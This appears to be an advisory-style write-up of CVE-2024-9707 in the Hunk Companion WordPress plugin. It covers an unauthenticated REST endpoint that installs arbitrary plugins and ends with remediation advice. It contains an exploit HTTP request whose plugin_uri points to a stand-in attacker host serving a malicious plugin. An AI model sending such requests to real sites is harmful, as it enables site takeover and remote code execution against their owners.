CVE-2024-9707 - Unauthorized Plugin Installation and Activation Vulnerability in Hunk Companion WordPress Plugin

A critical vulnerability has been discovered in the Hunk Companion plugin for WordPress, which can lead to unauthorized installation and activation of arbitrary plugins by unauthenticated attackers. The vulnerability, assigned CVE-2024-9707, affects all versions up to and including 1.8.4 of the Hunk Companion plugin. This flaw, if exploited, can potentially lead to remote code execution if another susceptible plugin is installed and activated on the target website.

Vulnerability Details

The Hunk Companion plugin for WordPress is susceptible to unauthorized plugin installation/activation due to a missing capability check on the /wp-json/hc/v1/themehunk-import REST API endpoint. As a result, an unauthenticated attacker can send a specially crafted request to this endpoint and install/activate arbitrary plugins. This can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated on the target website.

Original References

- Hunk Companion plugin on WordPress.org
- CVE-2024-9707 Advisory on NIST

Code Snippet

Consider the following example of an attacker exploiting this vulnerability using a simple HTTP request to the vulnerable endpoint:

POST /wp-json/hc/v1/themehunk-import HTTP/1.1
Host: target-website.com
Content-Type: application/json
Content-Length: <content-length>

{
    "plugin_slug": "arbitrary-plugin",
    "plugin_uri": "https://attacker-website.com/malicious-plugin.zip";,
    "activate": "true"
}

In this example, the attacker sends an HTTP request to the /wp-json/hc/v1/themehunk-import endpoint on the target website. The plugin_slug value corresponds to an arbitrary plugin the attacker intends to install/activate, while the plugin_uri value should contain a URL to the plugin archive hosted on the attacker's server.

Exploit Details

An attacker can exploit this vulnerability by crafting an HTTP request containing the plugin_slug and plugin_uri parameters in the JSON payload, pointing to a malicious plugin hosted on the attacker's server. Once the attacker sends this request to the vulnerable endpoint, the Hunk Companion plugin will download and install the plugin indicated by the plugin_uri parameter. Optionally, the "activate" parameter can be set to "true" to automatically activate the malicious plugin after installation.

Upon successful exploitation, an attacker can leverage other vulnerabilities in the activated plugin to perform actions such as privilege escalation, content manipulation, and remote code execution, depending on the specific issue.

Recommendation and Remediation

The developer has not yet released a patch for this vulnerability, so users are advised to deactivate and uninstall the Hunk Companion plugin until an update addressing this security issue is available. It is also essential to keep your WordPress installation and all other plugins up to date to minimize the risk of exploitation by known vulnerabilities.

Additionally, website administrators should monitor their WordPress installations for any signs of unauthorized activity, particularly the installation or activation of unfamiliar plugins. Regularly backing up your website and monitoring network traffic can also help detect and mitigate potential security issues.

Timeline

Published on: 10/11/2024 13:15:21 UTC
Last modified on: 10/15/2024 12:58:51 UTC